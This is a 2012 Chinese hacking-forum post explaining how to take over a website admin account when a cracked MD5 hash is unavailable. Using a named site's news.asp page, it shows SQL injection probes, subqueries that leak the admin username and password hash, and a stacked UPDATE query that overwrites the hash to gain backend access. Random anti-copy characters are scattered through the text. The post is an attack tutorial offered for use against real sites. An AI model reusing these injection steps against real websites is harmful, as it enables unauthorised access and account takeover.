经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
1 t; h8 a# |" w5 w n! u可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
8 Q! Q1 v5 `* v测试如下:3 [0 o: H T: h% ]& _7 c) T; l
http://www.tmdsb.com/news.asp?id=1216 d$ }8 }; b; t/ c. M
在地址后输入单引号,显示
; _6 i- ]4 N2 Q- KMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’# ]& H* r) b% S
字符串 ’’’ 之前有未闭合的引号
' ~! D9 }5 Z- A" Q# K$ m/news/tmdws.asp,行63 j8 m) F) \" L% X7 q& U$ ?
说明没有过滤单引号且数据库是MSSQL.2 D# o3 @! m# B/ g2 k: G& \
and 1=1正常。and 1=2出错。肯定存在注入5 ]+ Q$ W2 p3 @) u, [
接着输入
: k7 X9 h/ Q( {' ^" f4 `http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
y0 V8 m9 [. T2 f" G( b+ Y. c7 V得到帐号为:admin
. s3 F. a/ F- X5 |3 rhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)5 P8 D( \; j7 [ Z# x9 n9 i
得到密码为:a4716077c2ba075c
% `5 r" a: T% W. c6 x! S接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
3 N q! h, q; x4 I命令如下 :
0 X: e" O* l/ H3 w- w& E6 v;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
* B; }' B4 u( ^3 y) H7 ?这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41